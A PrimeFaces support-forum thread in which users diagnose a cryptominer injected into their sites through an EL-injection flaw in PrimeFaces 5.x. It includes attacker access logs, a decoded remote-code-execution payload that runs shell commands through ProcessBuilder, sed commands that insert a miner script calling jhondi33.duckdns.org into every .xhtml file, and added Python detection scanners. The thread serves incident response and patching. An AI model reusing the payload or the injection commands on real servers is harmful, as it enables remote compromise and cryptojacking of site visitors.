Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 18 Jan 2018, 20:20
by danielkohl
Hi all,

I switched to 6.1 yesterday and now I see this in my console (Chrome 62):

Code:

GET https://jhondi33.duckdns.org:7777/deepMiner.min.js net::ERR_TUNNEL_CONNECTION_FAILED
Location: ripple-effect.js.xhtml?ln=modena-layout:54

Code:

if(document){
	document.addEventListener('DOMContentLoaded', function () {
		var my_awesome_script = document.createElement('script');
		my_awesome_script.setAttribute('src','https://jhondi33.duckdns.org:7777/deepMiner.min.js');
		document.body.appendChild(my_awesome_script);
	});
}
Retrieving the script fortunately failed, but nevertheless this script is injected and part of the source.


Greetings

Daniel

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 18 Jan 2018, 21:09
by Melloware
@danielkohl and you have verified in your view source of your HTML page that 6.1 is actually in effect?

Code:

src="/javax.faces.resource/core.js.xhtml?ln=primefaces&v=6.1"

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 18 Jan 2018, 21:19
by tandraschko
Can you check the source file of ripple-effect.js to see if the code is really part of the file?

Let's say that the problem really is an EL injection problem (although it should not occur since 6.0):
I wonder if it's possible to manipulate resource files via EL injection...
And I also wonder how it's done... If it happens after some hours, it could be that a bot periodically calls a resource url with EL injection.
This means that you should add debug logging (request url, client,...) and check the exact time.

Also, it may be another bug - maybe in the JSF impl. MyFaces had a similar EL injection years ago (https://issues.apache.org/jira/browse/MYFACES-3405). Maybe there is still something in Mojarra.

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 00:22
by chimmelb
@Melloware - Great suggestion about looking for the 6.1 tags in the requested scripts, and @tandraschko for the idea to look at logs.

In an effort to help patch this bug (not to give ideas to other hackers), these are our NGINX access logs around the time of the injection. I don't understand all the stuff that looks like Base64 to me, but one can clearly see the script being added and commands being run. That is a nasty vulnerability, and looks exactly like the blog post about the EL injection from Github Issue #1152.

Code:

172.31.13.178 - - [15/Jan/2018:10:58:54 -0500] "GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB
0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7r
n%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA%2
BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mud
ycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4hou
h2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7XwVkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2F
KkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvl
gWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2A
JY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OT
M8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&cmd=cd+.%3Bpwd HT
TP/1.1" 200 60 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" "77.247.181.162"

172.31.13.178 - - [15/Jan/2018:10:58:57 -0500] "GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB
0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7r
n%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA%2
BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mud
ycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4hou
h2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7XwVkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2F
KkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvl
gWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2A
JY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OT
M8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&cmd=cd+..%3Bfind+
.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*jhondi33.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+deepMiner%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7C
g%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*smkimmo.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+deepMiner%5C.Anonymous.*%3C
%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*cryptoloot.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+CRL
T%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+%27s%7C%3C%2Fui%3Adefine%3E%7C%3Cscr%27%27ipt+src%3D%5C%22https%3A%2F%2Fjhondi33.duck
dns.org%3A7777%2FdeepMiner.js%5C%22%3E%3C%2Fs%27%27cript%3E%3Cscr%27%27ipt%3Evar+miner+%3D+new+deepMiner.Anonymous%28%5C%22605dee2nnpasaa%5C%22%29%3Bminer.start%28%29%3B%3C%2Fscri%27%27pt%3E%3C%
2Fui%3Adefine%3E%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+%27s%7C%3C%2Fh%3Abody%3E%7C%3Csc%27%27ript+src%3D%5C%22https%3A%2F%2Fjhondi33.duckdns.org%3A7777%2FdeepMin
er.js%5C%22%3E%3C%2Fscri%27%27pt%3E%3Csc%27%27ript%3Evar+miner+%3D+new+deepMiner.Anonymous%28%5C%22605dee2nnpasaa%5C%22%29%3Bminer.start%28%29%3B%3C%2Fscr%27%27ipt%3E%3C%2Fh%3Abody%3E%7Cg%27+2%3
E%261 HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" "77.247.181.162"

172.31.13.178 - - [15/Jan/2018:10:59:02 -0500] "GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7rn%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA%2BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mudycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4houh2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7XwVkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2FKkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvlgWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2AJY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OTM8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&cmd=cd+%2Flib%3Bfind+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7
C%3Cscript.*jhondi33.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+deepMiner%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*smkimmo.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+deepMiner%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+-e+%27s%7C%3Cscript.*cryptoloot.*%3C%5C%2Fscript%3E%7C%7Cg%27+-e+%27s%7C%3Cscript.*var+miner+%3D+new+CRLT%5C.Anonymous.*%3C%5C%2Fscript%3E%7C%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+%27s%7C%3C%2Fui%3Adefine%3E%7C%3Cscr%27%27ipt+src%3D%5C%22https%3A%2F%2Fjhondi33.duckdns.org%3A7777%2FdeepMiner.js%5C%22%3E%3C%2Fs%27%27cript%3E%3Cscr%27%27ipt%3Evar+miner+%3D+new+deepMiner.Anonymous%28%5C%22605dee2nnpasaa%5C%22%29%3Bminer.start%28%29%3B%3C%2Fscri%27%27pt%3E%3C%2Fui%3Adefine%3E%7Cg%27+2%3E%261%3B+find+.+-type+f+-name+%27*.xhtml%27+%7C+xargs+sed+-i+%27s%7C%3C%2Fh%3Abody%3E%7C%3Csc%27%27ript+src%3D%5C%22https%3A%2F%2Fjhondi33.duckdns.org%3A7777%2FdeepMiner.js%5C%22%3E%3C%2Fscri%27%27pt%3E%3Csc%27%27ript%3Evar+miner+%3D+new+deepMiner.Anonymous%28%5C%22605dee2nnpasaa%5C%22%29%3Bminer.start%28%29%3B%3C%2Fscr%27%27ipt%3E%3C%2Fh%3Abody%3E%7Cg%27+2%3E%261 HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" "77.247.181.162"

(this one is my own machine requesting around the time of the hack, and noting the 5.3 version there.)
172.31.13.178 - - [15/Jan/2018:10:59:02 -0500] "GET /javax.faces.resource/dynamiccontent.properties.xhtml?ln=primefaces&v=5.3&pfdrid=ZUexOiZiumPh9Fv3ERem%2Fgs6a3geXM9vtvTDgdHv7OQ%3D&pfdrt=sc&pfdrid_c=false&uid=72278d26-1d64-4b80-84f5-2f6cdecbc67b HTTP/1.1" 200 24542 "https://[REDACTED].xhtml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
Clever attack, but crazy dangerous. Definitely needs patching for anyone running an old 5.3, and a very urgent request to @danielkohl to post if this came back when using 6.1. Check those Apache/nginx logs.
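As an added example (not from the thread and not PrimeFaces code), a log check along the lines tandraschko suggested: it parses nginx access-log lines, picks out requests to the dynamiccontent.properties.xhtml endpoint that carry a cmd parameter or an oversized pfdrid, and URL-decodes the command for the analyst. The log lines are constructed; the attacker's real pfdrid payload is replaced by a placeholder, and the log format is assumed to be nginx's combined format with the extra quoted client field seen in chimmelb's logs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The PrimeFaces 5.x resource endpoint abused in the thread's access logs.
DYNAMIC_CONTENT = "/javax.faces.resource/dynamiccontent.properties.xhtml"

# nginx combined log format, plus the extra quoted client field seen in the thread.
LOG_RE = re.compile(
    r'^(?P<remote>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<xff>[^"]*)")?'
)

def inspect_line(line, pfdrid_limit=200):
    """Return a finding for one log line, or None if the request looks benign.

    Suspicious: a dynamic-content request with pfdrt=sc that either carries a
    cmd parameter (as in the thread) or a pfdrid far longer than a normal key.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != DYNAMIC_CONTENT:
        return None
    qs = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes the values
    if qs.get("pfdrt", [""])[0] != "sc":
        return None
    pfdrid = qs.get("pfdrid", [""])[0]
    cmd = qs.get("cmd", [None])[0]
    if cmd is None and len(pfdrid) <= pfdrid_limit:
        return None
    return {
        "time": m.group("time"),
        "client": m.group("xff") or m.group("remote"),  # prefer the forwarded address
        "status": int(m.group("status")),
        "pfdrid_len": len(pfdrid),
        "cmd": cmd,
    }

def scan(lines):
    """Run inspect_line over an iterable of log lines and collect the findings."""
    return [f for f in (inspect_line(l.rstrip("\n")) for l in lines) if f]

# Constructed sample lines in the shape of the thread's logs: a placeholder stands in
# for the real payload, the second line is an ordinary 5.3 resource request, and the
# third carries an oversized pfdrid with no cmd parameter.
UA = "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0"
SAMPLE_LINES = [
    f'172.31.13.178 - - [15/Jan/2018:10:58:54 -0500] "GET {DYNAMIC_CONTENT}'
    f'?pfdrt=sc&ln=primefaces&pfdrid=PLACEHOLDER_PAYLOAD&cmd=cd+.%3Bpwd HTTP/1.1" 200 60 "-" "{UA}" "77.247.181.162"',
    f'172.31.13.178 - - [15/Jan/2018:10:59:02 -0500] "GET {DYNAMIC_CONTENT}'
    f'?ln=primefaces&v=5.3&pfdrid=ZUexOiZiumPh9Fv3ERem%2Fgs6a3geXM9vtvTDgdHv7OQ%3D&pfdrt=sc&pfdrid_c=false HTTP/1.1" 200 24542 "https://app.example/index.xhtml" "{UA}"',
    f'172.31.13.178 - - [15/Jan/2018:11:02:10 -0500] "GET {DYNAMIC_CONTENT}'
    f'?pfdrt=sc&ln=primefaces&pfdrid={"A" * 600} HTTP/1.1" 200 5 "-" "{UA}" "77.247.181.162"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"{f['time']} {f['client']} status={f['status']} pfdrid_len={f['pfdrid_len']} cmd={f['cmd']!r}")
```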

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 09:44
by danielkohl
Melloware wrote:
18 Jan 2018, 21:09
@danielkohl and you have verified in your view source of your HTML page that 6.1 is actually in effect?

Code:

src="/javax.faces.resource/core.js.xhtml?ln=primefaces&v=6.1"
Yes, it's 6.1.

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 09:49
by cagatay.civici
There was a security issue in PrimeFaces 5.x, please update PrimeFaces to get this patched. The minimum versions required for the patch are:

5.2.21, 5.3.8 or 6.0

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 11:48
by tandraschko
Request 1:

Code:

${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 1:

Code:

cd .;pwd
Request 2:

Code:

${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 2:

Code:

&cmd=cd ..;find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*jhondi33.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*smkimmo.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*cryptoloot.*<\/script>||g' -e 's|<script.*var miner = new CRLT\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</ui:define>|<scr''ipt src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></s''cript><scr''ipt>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scri''pt></ui:define>|g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</h:body>|<sc''ript src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></scri''pt><sc''ript>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scr''ipt></h:body>|g' 2>&1
Request 3:

Code:

${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 3:

Code:

cmd=cd /lib;find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*jhondi33.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*smkimmo.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*cryptoloot.*<\/script>||g' -e 's|<script.*var miner = new CRLT\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</ui:define>|<scr''ipt src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></s''cript><scr''ipt>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scri''pt></ui:define>|g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</h:body>|<sc''ript src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></scri''pt><sc''ript>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scr''ipt></h:body>|g' 2>&1
As you can see, it runs something from the CMD url parameter. Will extract those commands now.
As I said, it's fixed since 6.0, but as something with ProcessBuilder is executed, it seems that a restart of the server with a new PF version doesn't remove that stuff.

Re: URGENT: Mining-script in Primfaces-Page? Where does it come from??

Posted: 19 Jan 2018, 12:01
by tandraschko
AFAICS it could be enough to completely clear the application server (all xhtml files must be removed) + redeploy.
I would clear the AppServer + redeploy with PF 6.1 - or completely reinstall!
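An added example (not from the thread and not PrimeFaces code) of checking whether the persisted injection is still present in an exploded deployment, which is what the advice to remove all xhtml files addresses: it walks a directory for .xhtml files and reports every line matching the indicators visible in the thread's sed commands. The sample tree, its file names and the miner site key are constructed.

```python
import os
import re
import tempfile

# Indicators taken from the sed commands in the thread's logs: the external miner
# host and the miner bootstrap calls the attacker inserted before </ui:define>
# and </h:body>, plus the older markers the same command strips out first.
INJECTION_MARKERS = re.compile(
    r"jhondi33\.duckdns\.org|deepMiner\.Anonymous|CRLT\.Anonymous|smkimmo|cryptoloot",
    re.IGNORECASE,
)

def scan_xhtml_tree(root):
    """Walk an exploded deployment and return (relative path, line_no, marker) per hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".xhtml"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for line_no, line in enumerate(fh, start=1):
                    for m in INJECTION_MARKERS.finditer(line):
                        hits.append((os.path.relpath(path, root), line_no, m.group(0)))
    return hits

# Constructed sample pages: one clean view and one template carrying the same
# injection shape the thread's sed command produces (site key is a placeholder).
CLEAN_PAGE = '<h:body xmlns:h="http://xmlns.jcp.org/jsf/html"><h:outputText value="ok"/></h:body>\n'
INJECTED_PAGE = (
    '<ui:composition xmlns:ui="http://xmlns.jcp.org/jsf/facelets">\n'
    '<ui:define name="content"><p>hello</p>'
    '<script src="https://jhondi33.duckdns.org:7777/deepMiner.js"></script>'
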